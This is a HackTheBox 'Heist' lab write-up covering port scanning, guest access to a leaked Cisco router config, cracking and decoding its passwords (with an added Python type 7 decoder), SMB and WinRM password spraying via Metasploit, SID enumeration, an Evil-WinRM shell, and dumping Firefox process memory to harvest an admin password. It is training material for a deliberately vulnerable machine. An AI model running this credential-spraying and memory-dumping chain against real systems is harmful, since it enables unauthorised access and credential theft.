HTB_Heist

This HackTheBox Heist writeup walks through the Heist machine (CTF). It is rated easy, which I don't entirely agree with.
CTFs are a great learning platform; don't forget to take notes every time you encounter something new.

As always, I have added the machine IP to /etc/hosts on my Linux machine as heist.htb.

Step 1 – if you have a host with an IP, nmap it.

The initial (top 1000 ports) nmap scan shows three open ports; scanning the full range with -p- turns up two more, 5985 (WinRM) and a high RPC port. The "filtered" ports are a firewall dropping packets, which is why the full scan takes over three minutes.

┌──(abhinav㉿ETHICALHACKX)-[~/htb]
└─$ nmap heist.htb                           
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-22 19:51 IST
Nmap scan report for heist.htb (10.10.10.149)
Host is up (0.19s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE
80/tcp  open  http
135/tcp open  msrpc
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 11.64 seconds

┌──(abhinav㉿ETHICALHACKX)-[~/htb]
└─$ nmap -p- -T5 heist.htb  
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-22 19:51 IST
Nmap scan report for heist.htb (10.10.10.149)
Host is up (0.18s latency).
Not shown: 65530 filtered ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
49669/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 201.88 seconds

Now a detailed scan with service/version detection and default scripts (-sV -sC), restricted to the five ports we found. Note the warning in the output: -T5 timing makes OS fingerprinting unreliable, so the missing OS match is a side effect of the speed setting rather than a hardened host; IIS 10.0 and SMB2 already tell us it is Windows.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ sudo nmap -sV -sC -A -O -p80,135,445,5985,49669 -T5 heist.htb -oA heist.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-22 20:00 IST
Nmap scan report for heist.htb (10.10.10.149)
Host is up (0.17s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Timing level 5 (Insane) used
No OS matches for host
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 1m40s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-22T14:33:24
|_  start_date: N/A

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   173.36 ms 10.10.14.1
2   173.48 ms heist.htb (10.10.10.149)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.43 seconds

Opening the site in a browser redirects us to login.php, a support portal login page.

Notice the Login as Guest option? Clicking it gets us in without credentials.

The guest view shows a support issue with an attachment: a Cisco IOS router configuration that contains credential material. The issue was raised by a user called Hazard, which gives us a first username to note.

version 12.2
no service pad
--SNIP--
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!

ip ssh version 2
!--SNIP--

 transport input ssh

We see three credential strings, but they are not all the same kind. The enable secret is type 5, an md5crypt hash (the $1$ prefix), so it has to be cracked offline. The two username lines use type 7, which is a reversible encoding with a fixed key, not a hash at all.
The type 5 hash falls to john with rockyou in a few seconds:

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ john hash --wordlist=~/htb/rockyou.txt --rules=Jumbo       

Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 0.00% (ETA: 2022-02-18 03:36) 0g/s 55508p/s 55508c/s 55508C/s 033192..perlis
stealth1agent    (?)
1g 0:00:00:14 DONE (2021-07-22 22:34) 0.06752g/s 236700p/s 236700c/s 236700C/s stealthy001..ste88dup
Use the "--show" option to display all of the cracked passwords reliably
Session completed

The two type 7 strings need no wordlist: they can be decoded directly with a small tool such as ciscot7, cloned from GitHub. (Cisco has long recommended replacing type 7 and type 5 with type 8 or 9 secrets for exactly this reason.)

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ git clone https://github.com/theevilbit/ciscot7.git     
Cloning into 'ciscot7'...
remote: Enumerating objects: 19, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 19 (delta 0), reused 0 (delta 0), pack-reused 15
Receiving objects: 100% (19/19), 6.75 KiB | 2.25 MiB/s, done.
Resolving deltas: 100% (5/5), done.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ cd ciscot7

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/ciscot7]
└─$ ls
ciscot7.py  LICENSE.md  README.md

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/ciscot7]
└─$ python ciscot7.py -p 0242114B0E143F015F5D1E161713  
Decrypted password: $uperP@ssword

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/ciscot7]
└─$ python ciscot7.py -p 02375012182C1A1D751618034F36415408
Decrypted password: Q4)sJu\Y8qz*A3?d
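To make clear why the type 7 strings fall so easily, here is an added example (not code from this writeup or from ciscot7) that implements the same decoding in Python and also parses the config's credential lines, decoding type 7 on the spot and tagging the type 5 enable secret for john. The XOR key is the fixed constant IOS uses for type 7 and is public knowledge; the sample config is the snippet from the attachment above. The notes attached to types 8 and 9 are this example's own summary, not something the box showed.

```python
"""Triage of the credential lines in a Cisco IOS config.

Added example: this is not code from the writeup or from ciscot7. It shows why
type 7 strings fall instantly (a fixed XOR key, public for years) while the
type 5 enable secret has to go to john. SAMPLE_CONFIG is the snippet from the
attachment on the Heist support page.
"""
import re

# The constant key IOS uses for "password 7". The first two digits of a type 7
# string are a decimal offset into this key where the XOR stream starts.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

# Matches "username <u> [privilege N] password|secret <type> <value>" and
# "enable secret|password <type> <value>" lines.
CRED_LINE = re.compile(
    r"^\s*(?:username\s+(?P<user>\S+)(?:\s+privilege\s+\d+)?\s+(?:password|secret)"
    r"|enable\s+(?:password|secret))\s+(?P<type>\d)\s+(?P<value>\S+)",
    re.MULTILINE,
)

# What each IOS password type means for someone holding the config (example's own summary).
TYPE_NOTES = {
    0: "cleartext",
    5: "md5crypt hash ($1$); crack offline, john format md5crypt",
    8: "PBKDF2-SHA256; slow to crack, try reuse of other passwords first",
    9: "scrypt; slow to crack, try reuse of other passwords first",
}


def type7_decode(encoded: str) -> str:
    """Reverse a type 7 string: each byte XOR key[(seed + i) % len(key)]."""
    if len(encoded) < 4 or len(encoded) % 2 or not encoded[:2].isdigit():
        raise ValueError(f"not a type 7 string: {encoded!r}")
    seed = int(encoded[:2])
    body = bytes.fromhex(encoded[2:])
    plain = bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(body))
    return plain.decode("latin-1")


def type7_encode(plain: str, seed: int = 2) -> str:
    """Forward direction, to show the scheme is symmetric: there is no secret
    key, so the "encryption" is only obfuscation."""
    if not 0 <= seed <= 99:
        raise ValueError("seed must fit in two decimal digits")
    body = plain.encode("latin-1")
    enc = bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(body))
    return f"{seed:02d}{enc.hex().upper()}"


def triage_config(config: str) -> list:
    """Return one record per credential line: type 7 decoded on the spot,
    everything else tagged with what to do next."""
    findings = []
    for m in CRED_LINE.finditer(config):
        user = m.group("user") or "enable"
        ptype, value = int(m.group("type")), m.group("value")
        rec = {"user": user, "type": ptype}
        if ptype == 7:
            rec["plaintext"] = type7_decode(value)
        elif ptype == 0:
            rec["plaintext"] = value
        else:
            rec["hash"] = value
            rec["note"] = TYPE_NOTES.get(ptype, "unknown type")
        findings.append(rec)
    return findings


# The credential lines from the attachment on the Heist support page.
SAMPLE_CONFIG = """\
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

if __name__ == "__main__":
    for f in triage_config(SAMPLE_CONFIG):
        print(f)
```

Running it prints one record per credential line: the two type 7 values come out as $uperP@ssword and Q4)sJu\Y8qz*A3?d, matching ciscot7, and the enable secret is reported as an md5crypt hash to hand to john. The encode function exists only to show the scheme is symmetric; with no per-device secret, anyone who holds the config holds the passwords.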
               

So far we have three passwords and a few candidate usernames (guesses only): rout3r and admin from the config, hazard from the issue poster.

stealth1agent
$uperP@ssword
Q4)sJu\Y8qz*A3?d

usernames

rout3r
admin
hazard

crackmapexec can test every username/password combination against SMB on port 445.

The same can also be done with Metasploit's smb_login scanner, which is what I used here, with user.txt and password.txt built from the lists above. Only Windows accounts are tested this way; the web portal's own logins are a separate credential store.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ sudo msfdb run
[sudo] password for abhinav: 
msf6 > creds
Credentials
===========

host  origin  service  public  private  realm  private_type  JtR Format
----  ------  -------  ------  -------  -----  ------------  ----------

msf6 > setg USER_FILE user.txt
USER_FILE => user.txt
msf6 > setg PASS_FILE password.txt
PASS_FILE => password.txt
msf6 > setg RHOSTS heist.htb
RHOSTS => heist.htb
msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > show options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   PASS_FILE          password.txt     no        File containing passwords, one per line
   RHOSTS             heist.htb        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT              445              yes       The SMB service port (TCP)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_FILE          user.txt         no        File containing usernames, one per line

msf6 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.149:445      - 10.10.10.149:445 - Starting SMB login bruteforce
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\rout3r:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\rout3r:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\rout3r:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\admin:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\admin:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\admin:Q4)sJu\Y8qz*A3?d',
[+] 10.10.10.149:445      - 10.10.10.149:445 - Success: '.\hazard:stealth1agent'
[*] heist.htb:445         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) > creds
Credentials
===========

host          origin        service        public  private        realm  private_type  JtR Format
----          ------        -------        ------  -------        -----  ------------  ----------
10.10.10.149  10.10.10.149  445/tcp (smb)  hazard  stealth1agent         Password      

msf6 auxiliary(scanner/smb/smb_login) > 

With one valid SMB login (hazard), impacket's lookupsid.py can enumerate more accounts. It cycles through RIDs over the LSARPC named pipe and asks the host to resolve each SID to a name, which works for any authenticated user even when anonymous enumeration is blocked.

┌──(abhinav㉿ETHICALHACKX)-[/usr/share/doc/python3-impacket/examples]
└─$ python3 lookupsid.py 'hazard:stealth1agent'@heist.htb
Impacket v0.9.24.dev1+20210611.72516.1a5ed9dc - Copyright 2021 SecureAuth Corporation

[*] Brute forcing SIDs at heist.htb
[*] StringBinding ncacn_np:heist.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

We get a few more usernames:

support
chase
jason

Let's run the SMB scanner again with the updated user list (the module keeps the earlier settings, so only user.txt has changed):

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   PASS_FILE          password.txt     no        File containing passwords, one per line
   RHOSTS             heist.htb        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_FILE          user.txt         no        File containing usernames, one per line

msf6 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.149:445      - 10.10.10.149:445 - Starting SMB login bruteforce
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\rout3r:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\rout3r:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\rout3r:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\admin:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\admin:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\admin:Q4)sJu\Y8qz*A3?d',
[+] 10.10.10.149:445      - 10.10.10.149:445 - Success: '.\hazard:stealth1agent'
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\support:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\support:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\support:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\chase:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\chase:$uperP@ssword',
[+] 10.10.10.149:445      - 10.10.10.149:445 - Success: '.\chase:Q4)sJu\Y8qz*A3?d'
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\jason:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\jason:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\jason:Q4)sJu\Y8qz*A3?d',
[*] heist.htb:445         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

So we have a new username:password combo, chase:Q4)sJu\Y8qz*A3?d, on top of hazard:stealth1agent from before. Note the reuse: the router's privilege 15 admin password is also Chase's Windows password.

Port 5985 is WinRM, so let's try the same credentials there with the winrm_login module. Setting USERNAME to chase adds him to the users from user.txt; chase turns out to be the only account allowed to log in over WinRM.

msf6 auxiliary(scanner/smb/smb_login) > use auxiliary/scanner/winrm/winrm_login 
msf6 auxiliary(scanner/winrm/winrm_login) > show options

Module options (auxiliary/scanner/winrm/winrm_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DOMAIN            WORKSTATION      yes       The domain to use for Windows authentification
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE         password.txt     no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            heist.htb        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             5985             yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   URI               /wsman           yes       The URI of the WinRM service
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE         user.txt         no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
   VHOST                              no        HTTP server virtual host

msf6 auxiliary(scanner/winrm/winrm_login) > set USERNAME chase
USERNAME => chase
msf6 auxiliary(scanner/winrm/winrm_login) > run

[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\chase:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\chase:$uperP@ssword (Incorrect: )
[+] 10.10.10.149:5985 - Login Successful: WORKSTATION\chase:Q4)sJu\Y8qz*A3?d
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\admin:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\admin:$uperP@ssword (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\admin:Q4)sJu\Y8qz*A3?d (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\hazard:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\hazard:$uperP@ssword (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\hazard:Q4)sJu\Y8qz*A3?d (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\support:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\support:$uperP@ssword (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\support:Q4)sJu\Y8qz*A3?d (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\jason:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\jason:$uperP@ssword (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\jason:Q4)sJu\Y8qz*A3?d (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/winrm/winrm_login) > 

Since chase can authenticate to WinRM, we use Evil-WinRM for an interactive shell (clone it from GitHub). It is a Ruby script, so install the gems listed in its Gemfile with sudo gem install followed by the gem names separated by spaces, then run ruby evil-winrm.rb -u chase -p 'Q4)sJu\Y8qz*A3?d' -i heist.htb.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ git clone https://github.com/Hackplayers/evil-winrm.git
Cloning into 'evil-winrm'...
--SNIP---
Receiving objects: 100% (971/971), 2.01 MiB | 5.91 MiB/s, done.
Resolving deltas: 100% (566/566), done.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ cd evil-winrm

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/evil-winrm]
└─$ ls
CHANGELOG.md  CODE_OF_CONDUCT.md  CONTRIBUTING.md  Dockerfile  evil-winrm.rb  Gemfile  Gemfile.lock  LICENSE  README.md  resources

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/evil-winrm]
└─$ cat Gemfile       
source 'https://rubygems.org'

gem 'winrm'
gem 'winrm-fs'
gem 'stringio'
gem 'logger'
gem 'fileutils'

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/evil-winrm]
└─$ sudo gem install winrm winrm-fs stringio logger fileutils
[sudo] password for abhinav: 
Fetching nori-2.6.0.gem
Fetching gssapi-1.3.1.gem
Fetching logging-2.3.0.gem
Fetching winrm-2.3.6.gem
--SNIP---
13 gems installed

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/evil-winrm]
└─$ ruby evil-winrm.rb -u chase -p 'Q4)sJu\Y8qz*A3?d' -i heist.htb               

Evil-WinRM shell v3.0

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents> 

As usual, we look for the user flag on the Desktop; a recursive listing of Chase's profile shows everything there is, including a todo.txt worth reading.

*Evil-WinRM* PS C:\Users\Chase> gci -recurse . | select fullname

FullName
--------
C:\Users\Chase\3D Objects
C:\Users\Chase\Contacts
C:\Users\Chase\Desktop
C:\Users\Chase\Documents
C:\Users\Chase\Downloads
C:\Users\Chase\Favorites
C:\Users\Chase\Links
C:\Users\Chase\Music
C:\Users\Chase\Pictures
C:\Users\Chase\Saved Games
C:\Users\Chase\Searches
C:\Users\Chase\Videos
C:\Users\Chase\Desktop\todo.txt
C:\Users\Chase\Desktop\user.txt
C:\Users\Chase\Downloads\VMware-tools-11.2.5-17337674-x86_64.exe
C:\Users\Chase\Favorites\Links
C:\Users\Chase\Favorites\Bing.url
C:\Users\Chase\Links\Desktop.lnk
C:\Users\Chase\Links\Downloads.lnk

*Evil-WinRM* PS C:\Users\Chase> cd desktop
*Evil-WinRM* PS C:\Users\Chase\desktop> ls


    Directory: C:\Users\Chase\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/22/2019   9:08 AM            121 todo.txt
-a----        4/22/2019   9:07 AM             32 user.txt


*Evil-WinRM* PS C:\Users\Chase\desktop> type user.txt
a127daef77ab6d9d92008653295f59c4
*Evil-WinRM* PS C:\Users\Chase\desktop> type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

Done:
1. Restricted access for guest user.
*Evil-WinRM* PS C:\Users\Chase\desktop> 

Poking around the other user directories, inetpub and so on turns up nothing useful, since we have no write access and nothing readable of interest.
However, Program Files contains Mozilla Firefox, and Get-Process shows several firefox processes running. A browser left open holds whatever was typed into it (URLs, form fields, session cookies) in plain memory, so its process memory is the next thing to look at.

*Evil-WinRM* PS C:\Users\Chase> cd ../..
*Evil-WinRM* PS C:\> gci


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        4/21/2019   5:33 PM                inetpub
d-----        9/15/2018  12:49 PM                PerfLogs
d-r---        2/18/2021   4:17 PM                Program Files
d-----        4/22/2019   6:56 AM                Program Files (x86)
d-r---        4/22/2019   7:26 AM                Users
d-----        2/18/2021   4:06 PM                Windows



*Evil-WinRM* PS C:\> cd 'program files'
*Evil-WinRM* PS C:\program files> gci


    Directory: C:\program files


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        4/21/2019   9:39 AM                Common Files
d-----        4/21/2019  11:00 AM                internet explorer
d-----        2/18/2021   4:21 PM                Mozilla Firefox
d-----        4/22/2019   6:47 AM                PHP
d-----        4/22/2019   6:46 AM                Reference Assemblies
d-----        4/22/2019   6:46 AM                runphp
d-----        2/18/2021   4:05 PM                VMware
d-r---        4/21/2019  11:00 AM                Windows Defender
d-----        4/21/2019  11:00 AM                Windows Defender Advanced Threat Protection
d-----        9/15/2018  12:49 PM                Windows Mail
d-----        4/21/2019  11:00 AM                Windows Media Player
d-----        9/15/2018  12:49 PM                Windows Multimedia Platform
d-----        9/15/2018  12:58 PM                windows nt
d-----        4/21/2019  11:00 AM                Windows Photo Viewer
d-----        9/15/2018  12:49 PM                Windows Portable Devices
d-----        9/15/2018  12:49 PM                Windows Security
d-----        9/15/2018  12:49 PM                WindowsPowerShell


*Evil-WinRM* PS C:\program files> Get-Process

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    468      18     2264       5400               372   0 csrss
  ---SNIP---
   1077      73   172240     248556       6.70   6184   1 firefox
    347      20     9912      34732       0.22   6300   1 firefox
    401      35    40716     104456       1.09   6436   1 firefox
    378      28    25040      62648       1.09   6752   1 firefox
    355      25    16324      38932       0.11   6964   1 firefox
 ----SNIP
   1312      27    69108      86932       1.08    968   0 wsmprovhost


*Evil-WinRM* PS C:\program files> 

Let us dump the memory of those firefox processes with ProcDump from Microsoft's Sysinternals suite.
Upload procdump64.exe to a directory chase can write to (the Desktop will do). A non-admin user can only dump processes running under their own account, so the dumps succeeding below also tells us that Firefox is running as Chase.

*Evil-WinRM* PS C:\program files> cd 'C:/users/chase/desktop'
*Evil-WinRM* PS C:\users\chase\desktop> upload /home/abhinav/htb/heist/SysinternalsSuite/procdump64.exe
Info: Uploading /home/abhinav/htb/heist/SysinternalsSuite/procdump64.exe to C:\users\chase\desktop\procdump64.exe

Data: 535048 bytes of 535048 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\users\chase\desktop> gci


    Directory: C:\users\chase\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/29/2021   1:17 AM         401288 procdump64.exe
-a----        4/22/2019   9:08 AM            121 todo.txt
-a----        4/22/2019   9:07 AM             32 user.txt


*Evil-WinRM* PS C:\users\chase\desktop> 
*Evil-WinRM* PS C:\users\chase\desktop> ./procdump64.exe -accepteula

Now dump each firefox process with ./procdump64.exe -ma <pid>, one PID at a time. -ma writes a full memory dump; without it ProcDump writes a minidump that leaves out most of the process memory, which is where the strings we want live.
The EULA only needs accepting once (the -accepteula run above); otherwise ProcDump tries to show a licence prompt we cannot answer from a WinRM shell.

*Evil-WinRM* PS C:\users\chase\desktop> ./procdump64.exe -ma 6184

ProcDump v10.1 - Sysinternals process dump utility
Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[01:22:00] Dump 1 initiated: C:\users\chase\desktop\firefox.exe_210729_012200.dmp
[01:22:01] Dump 1 writing: Estimated dump file size is 529 MB.
[01:22:02] Dump 1 complete: 529 MB written in 1.4 seconds
[01:22:02] Dump count reached.

*Evil-WinRM* PS C:\users\chase\desktop> ./procdump64.exe -ma 6300

ProcDump v10.1 - Sysinternals process dump utility
Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[01:22:20] Dump 1 initiated: C:\users\chase\desktop\firefox.exe_210729_012220.dmp
[01:22:20] Dump 1 writing: Estimated dump file size is 293 MB.
[01:22:20] Dump 1 complete: 293 MB written in 0.4 seconds
[01:22:21] Dump count reached.

*Evil-WinRM* PS C:\users\chase\desktop> ./procdump64.exe -ma 6436

ProcDump v10.1 - Sysinternals process dump utility
Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[01:22:32] Dump 1 initiated: C:\users\chase\desktop\firefox.exe_210729_012232.dmp
[01:22:32] Dump 1 writing: Estimated dump file size is 350 MB.
[01:22:33] Dump 1 complete: 350 MB written in 0.5 seconds
[01:22:33] Dump count reached.

*Evil-WinRM* PS C:\users\chase\desktop> ./procdump64.exe -ma 6752

ProcDump v10.1 - Sysinternals process dump utility
Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[01:22:41] Dump 1 initiated: C:\users\chase\desktop\firefox.exe_210729_012241.dmp
[01:22:41] Dump 1 writing: Estimated dump file size is 310 MB.
[01:22:42] Dump 1 complete: 310 MB written in 0.4 seconds
[01:22:42] Dump count reached.

*Evil-WinRM* PS C:\users\chase\desktop> ./procdump64.exe -ma 6964

ProcDump v10.1 - Sysinternals process dump utility
Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[01:22:50] Dump 1 initiated: C:\users\chase\desktop\firefox.exe_210729_012250.dmp
[01:22:50] Dump 1 writing: Estimated dump file size is 298 MB.
[01:22:51] Dump 1 complete: 298 MB written in 0.4 seconds
[01:22:51] Dump count reached.

*Evil-WinRM* PS C:\users\chase\desktop> 

Downloading these dumps to the attacking machine (Evil-WinRM's download command is the counterpart of upload) takes a while depending on network speed; together they come to about 1.8 GB:

*Evil-WinRM* PS C:\users\chase\desktop> gci


    Directory: C:\users\chase\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/29/2021   1:22 AM      541427283 firefox.exe_210729_012200.dmp
-a----        7/29/2021   1:22 AM      299695231 firefox.exe_210729_012220.dmp
-a----        7/29/2021   1:22 AM      358364796 firefox.exe_210729_012232.dmp
-a----        7/29/2021   1:22 AM      317007025 firefox.exe_210729_012241.dmp
-a----        7/29/2021   1:22 AM      304502485 firefox.exe_210729_012250.dmp
-a----        7/29/2021   1:17 AM         401288 procdump64.exe
-a----        4/22/2019   9:08 AM            121 todo.txt
-a----        4/22/2019   9:07 AM             32 user.txt

Running strings over the dumps and grepping for "password" gives the result, for me in the one ending in 012220.dmp: the administrator's web login, admin@support.htb : 4dD!5}x/re8]FBuZ. Run strings with -el as well as the default, since Windows keeps much of its in-memory text as UTF-16LE and plain strings misses it. Don't forget to add administrator to user.txt and the new password to password.txt.
